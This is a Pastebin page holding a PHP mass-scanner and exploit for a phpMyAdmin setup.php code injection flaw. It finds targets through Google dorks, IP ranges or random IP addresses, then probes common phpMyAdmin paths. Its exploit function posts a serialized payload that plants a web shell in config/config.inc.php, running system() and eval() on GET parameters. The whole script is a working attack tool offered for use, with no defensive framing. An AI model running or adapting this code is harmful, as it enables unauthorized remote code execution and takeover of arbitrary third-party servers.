Googleinurl

[SCANNER] phpMyAdmin Code Injection RCE Scanner & Exploit

Jun 26th, 2015
5,761
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10.  * ***************************************************************
  11.   pmaPWN.php - d3ck4, hacking.expose@gmail.com
  12.   phpMyAdmin Code Injection RCE Scanner & Exploit
  13.   This is PHP version original http://milw0rm.com/exploits/8921
  14.   credit: Greg Ose, pagvac @ gnucitizen.org
  15.   greetz: Hacking Expose!, HM Security, darkc0de
  16.  * ***************************************************************
  17.  
  18.   EDITADO POR GoogleINURL
  19.   blog.inurl.com.br
  20.  */
  21.  
  22.  
  23. $list = array(
  24.     '/phpmyadmin/',
  25.     '/phpMyAdmin/',
  26.     '/PMA/',
  27.     '/pma/',
  28.     '/admin/',
  29.     '/dbadmin/',
  30.     '/mysql/',
  31.     '/myadmin/',
  32.     '/phpmyadmin2/',
  33.     '/phpMyAdmin2/',
  34.     '/phpMyAdmin-2/',
  35.     '/php-my-admin/',
  36.     '/phpMyAdmin-2.2.3/',
  37.     '/phpMyAdmin-2.2.6/',
  38.     '/phpMyAdmin-2.5.1/',
  39.     '/phpMyAdmin-2.5.4/',
  40.     '/phpMyAdmin-2.5.5-rc1/',
  41.     '/phpMyAdmin-2.5.5-rc2/',
  42.     '/phpMyAdmin-2.5.5/',
  43.     '/phpMyAdmin-2.5.5-pl1/',
  44.     '/phpMyAdmin-2.5.6-rc1/',
  45.     '/phpMyAdmin-2.5.6-rc2/',
  46.     '/phpMyAdmin-2.5.6/',
  47.     '/phpMyAdmin-2.5.7/',
  48.     '/phpMyAdmin-2.5.7-pl1/',
  49.     '/phpMyAdmin-2.6.0-alpha/',
  50.     '/phpMyAdmin-2.6.0-alpha2/',
  51.     '/phpMyAdmin-2.6.0-beta1/',
  52.     '/phpMyAdmin-2.6.0-beta2/',
  53.     '/phpMyAdmin-2.6.0-rc1/',
  54.     '/phpMyAdmin-2.6.0-rc2/',
  55.     '/phpMyAdmin-2.6.0-rc3/',
  56.     '/phpMyAdmin-2.6.0/',
  57.     '/phpMyAdmin-2.6.0-pl1/',
  58.     '/phpMyAdmin-2.6.0-pl2/',
  59.     '/phpMyAdmin-2.6.0-pl3/',
  60.     '/phpMyAdmin-2.6.1-rc1/',
  61.     '/phpMyAdmin-2.6.1-rc2/',
  62.     '/phpMyAdmin-2.6.1/',
  63.     '/phpMyAdmin-2.6.1-pl1/',
  64.     '/phpMyAdmin-2.6.1-pl2/',
  65.     '/phpMyAdmin-2.6.1-pl3/',
  66.     '/phpMyAdmin-2.6.2-rc1/',
  67.     '/phpMyAdmin-2.6.2-beta1/',
  68.     '/phpMyAdmin-2.6.2-rc1/',
  69.     '/phpMyAdmin-2.6.2/',
  70.     '/phpMyAdmin-2.6.2-pl1/',
  71.     '/phpMyAdmin-2.6.3/',
  72.     '/phpMyAdmin-2.6.3-rc1/',
  73.     '/phpMyAdmin-2.6.3/',
  74.     '/phpMyAdmin-2.6.3-pl1/',
  75.     '/phpMyAdmin-2.6.4-rc1/',
  76.     '/phpMyAdmin-2.6.4-pl1/',
  77.     '/phpMyAdmin-2.6.4-pl2/',
  78.     '/phpMyAdmin-2.6.4-pl3/',
  79.     '/phpMyAdmin-2.6.4-pl4/',
  80.     '/phpMyAdmin-2.6.4/',
  81.     '/phpMyAdmin-2.7.0-beta1/',
  82.     '/phpMyAdmin-2.7.0-rc1/',
  83.     '/phpMyAdmin-2.7.0-pl1/',
  84.     '/phpMyAdmin-2.7.0-pl2/',
  85.     '/phpMyAdmin-2.7.0/',
  86.     '/phpMyAdmin-2.8.0-beta1/',
  87.     '/phpMyAdmin-2.8.0-rc1/',
  88.     '/phpMyAdmin-2.8.0-rc2/',
  89.     '/phpMyAdmin-2.8.0/',
  90.     '/phpMyAdmin-2.8.0.1/',
  91.     '/phpMyAdmin-2.8.0.2/',
  92.     '/phpMyAdmin-2.8.0.3/',
  93.     '/phpMyAdmin-2.8.0.4/',
  94.     '/phpMyAdmin-2.8.1-rc1/',
  95.     '/phpMyAdmin-2.8.1/',
  96.     '/phpMyAdmin-2.8.2/',
  97.     '/sqlmanager/',
  98.     '/mysqlmanager/',
  99.     '/p/m/a/',
  100.     '/PMA2005/',
  101.     '/pma2005/',
  102.     '/phpmanager/',
  103.     '/php-myadmin/',
  104.     '/phpmy-admin/',
  105.     '/webadmin/',
  106.     '/sqlweb/',
  107.     '/websql/',
  108.     '/webdb/',
  109.     '/mysqladmin/',
  110.     '/mysql-admin/',
  111. );
  112.  
  113. function filterHost($array = array()) {
  114.     if (!empty($array)) {
  115.         foreach ($array as $value) {
  116.             $real = parse_url("http://{$value}");
  117.             $_[] = "http://" . $real['host'];
  118.         }
  119.  
  120.         return array_filter(array_unique($_));
  121.     } else {
  122.  
  123.         return NULL;
  124.     }
  125. }
  126.  
  127. ################################################################################
  128. #GENERATOR RANGE IP#############################################################
  129. ################################################################################
  130.  
  131. function __generatorRangeIP($range) {
  132.  
  133.     $ip_ = explode(',', $range);
  134.     if (is_array($ip_)) {
  135.  
  136.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  137.         while ($_[0] <= $_[1]) {
  138.  
  139.             $ips[] = "http://" . long2ip($_[0]);
  140.             $_[0] ++;
  141.         }
  142.     } else {
  143.  
  144.         return FALSE;
  145.     }
  146.  
  147.     return $ips;
  148. }
  149.  
  150. ################################################################################
  151. #GENERATOR RANGE IP RANDOM######################################################
  152. ################################################################################
  153.  
  154. function __generatorIPRandom($cont) {
  155.  
  156.     $cont[0] = 0;
  157.     while ($cont[0] < $cont[1]) {
  158.  
  159.         $bloc[0] = rand(0, 255);
  160.         $bloc[1] = rand(0, 255);
  161.         $bloc[2] = rand(0, 255);
  162.         $bloc[3] = rand(0, 255);
  163.         $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  164.  
  165.         $cont[0] ++;
  166.     }
  167.     return array_unique($ip);
  168. }
  169.  
  170. $banner = "
  171. \t---------------------------------------------------------------
  172. \t        phpMyAdmin Code Injection RCE Scanner & Exploit
  173. \t  This is PHP version original http://milw0rm.com/exploits/8921
  174. \t        Edited by GoogleINURL - http://blog.inurl.com.br
  175. \t---------------------------------------------------------------
  176. \n";
  177.  
  178. if ($argc > 1) {
  179.     print $banner;
  180.     print "Usage: php $argv[0] \n";
  181.     exit;
  182. }
  183.  
  184. print $banner;
  185. print "\n";
  186. $Handlex = FOpen("pmaPWN.log", "a+");
  187. FWrite($Handlex, $banner);
  188.  
  189. print "[-] Master, where you want to go today? \n";
  190. print "[-] OPTIONS: \n";
  191. print "---------------------------------------------------------------------\n";
  192. print "[+] DORKING:         [ 1 ]\n";
  193. print "[+] RANGE IP:        [ 2 ]\n";
  194. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  195. print "[+] VALUES FILE:     [ 4 ]\n";
  196. print "---------------------------------------------------------------------\n";
  197. fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
  198. $op = trim(fgets(STDIN));
  199.  
  200. if ($op == 1) {
  201.     print "[-] example: intitle:phpMyAdmin\n";
  202.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
  203.     $dork = urlencode(trim(fgets(STDIN)));
  204.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  205.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  206. //for($i = 0; $i <= 2; $i+=100) {
  207.     $ch = curl_init();
  208.     curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
  209.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  210.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  211.     curl_setopt($ch, CURLOPT_HEADER, 1);
  212.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  213.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  214.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  215.     $pg = curl_exec($ch);
  216.     curl_close($ch);
  217.  
  218. # MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
  219.    $html = str_replace('href="/url?q=', 'href="', $pg);
  220.     $html = str_replace('https://www.google.com.br', '', $html);
  221.     $html = str_replace('http://www.phpmyadmin.net', '', $html);
  222.  
  223.     preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
  224.     $_ = array_filter(array_unique($links[2]));
  225.  
  226. //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
  227. //}
  228.     $res = filterHost($_);
  229. }
  230.  
  231. if ($op == 2) {
  232.     print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  233.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
  234.     $value = (trim(fgets(STDIN)));
  235.     $res = __generatorRangeIP($value);
  236. }
  237.  
  238. if ($op == 3) {
  239.     print "\n[-] Amount of IPS / example: 255 \n";
  240.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
  241.     $value = (trim(fgets(STDIN)));
  242.     $res = __generatorIPRandom(array([0] => 0, 1 => $value));
  243. }
  244.  
  245. if ($op == 4) {
  246.     print "[-] example: hosts.txt ";
  247.     fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
  248.     $value = (trim(fgets(STDIN)));
  249.     $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  250. }
  251.  
  252.  
  253.  
  254. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  255. print "---------------------------------------------------------------------\n";
  256. $total = count($res);
  257. print "\n[+] Done. $total rows return.\n";
  258. FWrite($Handlex, "[+] Done. $total rows return.\n");
  259. FClose($Handlex);
  260.  
  261. //   foreach($res as $key) {
  262. $cont = 1;
  263. foreach ($res as $url) {
  264.  
  265.     $Handlex = FOpen("pmaPWN.log", "a+");
  266.     //$real = parse_url("http://{$target}");
  267.     //$url = "http://" . $real['host'];
  268.     print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
  269.     $cont++;
  270.     FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
  271.     FClose($Handlex);
  272.     sleep(5);
  273.     $curlHandle = curl_multi_init();
  274.     for ($i = 0; $i < count($list); $i++)
  275.         $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
  276.     ExecHandle($curlHandle);
  277.     for ($i = 0; $i < count($list); $i++) {
  278.         $text[$i] = curl_multi_getcontent($curl[$i]);
  279.         //echo $url.$list[$i]."\n";
  280.         $Handlex = FOpen("pmaPWN.log", "a+");
  281.         if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  282.             print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
  283.             print "\n[+] Testing vulnerable, wait sec..\n";
  284.             FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
  285.             FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  286.             if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  287.                 print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
  288.                 FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
  289.             }
  290.             FClose($Handlex);
  291.             exploit_site($url . $list[$i]);
  292.         }
  293.     }
  294.     for ($i = 0; $i < count($list); $i++)//remove the handles
  295.         curl_multi_remove_handle($curlHandle, $curl[$i]);
  296.     curl_multi_close($curlHandle);
  297.     sleep(5);
  298. }
  299.  
  300. // }
  301.  
  302. function addHandle(&$curlHandle, $url) {
  303.     $cURL = curl_init();
  304.     curl_setopt($cURL, CURLOPT_URL, $url);
  305.     curl_setopt($cURL, CURLOPT_HEADER, 0);
  306.     curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  307.     curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  308.     curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  309.     curl_multi_add_handle($curlHandle, $cURL);
  310.     return $cURL;
  311. }
  312.  
  313. //execute the handle until the flag passed
  314. // to function is greater then 0
  315. function ExecHandle(&$curlHandle) {
  316.     $flag = null;
  317.     do {
  318. //fetch pages in parallel
  319.         curl_multi_exec($curlHandle, $flag);
  320.     } while ($flag > 0);
  321. }
  322.  
  323. function exploit_site($url) {
  324.     $ch = curl_init();
  325.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  326.     curl_setopt($ch, CURLOPT_HEADER, 1);
  327.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  328.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  329.     curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
  330.     $result = curl_exec($ch);
  331.     curl_close($ch);
  332.     $ch2 = curl_init();
  333.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  334.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  335.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  336.     curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
  337.     $result2 = curl_exec($ch2);
  338.     curl_close($ch2);
  339.     //print $url;
  340.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  341.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  342.         print "\n[+] Exploiting, wait sec..\n";
  343.         $Handlex = FOpen("pmaPWN.log", "a+");
  344.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  345.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  346.         FClose($Handlex);
  347.         exploit($url);
  348.     } else {
  349.         $Handlex = FOpen("pmaPWN.log", "a+");
  350.         print "\n[-] Shit! no luck.. not vulnerable\n";
  351.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  352.         FClose($Handlex);
  353.     }
  354. }
  355.  
  356. function exploit($w00t) {
  357.     $Handlex = FOpen("pmaPWN.log", "a+");
  358.     $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  359.     //first get cookie + token
  360.     $curl = curl_init();
  361.     curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
  362.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  363.     curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  364.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  365.     curl_setopt($curl, CURLOPT_TIMEOUT, 100);
  366.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  367.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  368.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  369.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  370.     curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  371.     curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  372.     $result = curl_exec($curl);
  373.     curl_close($curl);
  374.     if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
  375.         ;
  376.  
  377.     $token = $matches[1][1];
  378.     if ($token != '') {
  379.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  380.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  381.         $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  382.         print "\n[+] Sending evil payload mwahaha.. \n";
  383.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  384.         $curl = curl_init();
  385.         curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
  386.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  387.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  388.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  389.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  390.         curl_setopt($curl, CURLOPT_POST, true);
  391.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  392.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  393.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  394.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  395.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  396.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  397.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  398.         $result = curl_exec($curl);
  399.         curl_close($curl);
  400.  
  401.         print "\n[!] w00t! w00t! You should now have shell here";
  402.         print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
  403.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  404.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  405.         FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
  406.     } else {
  407.         print "\n[!] Shit! no luck.. not vulnerable\n";
  408.         FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  409.         return false;
  410.     }
  411.     FClose($Handlex);
  412.     if (file_exists('exploitcookie.txt')) {
  413.         unlink('exploitcookie.txt');
  414.     }
  415.     //exit();
  416. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×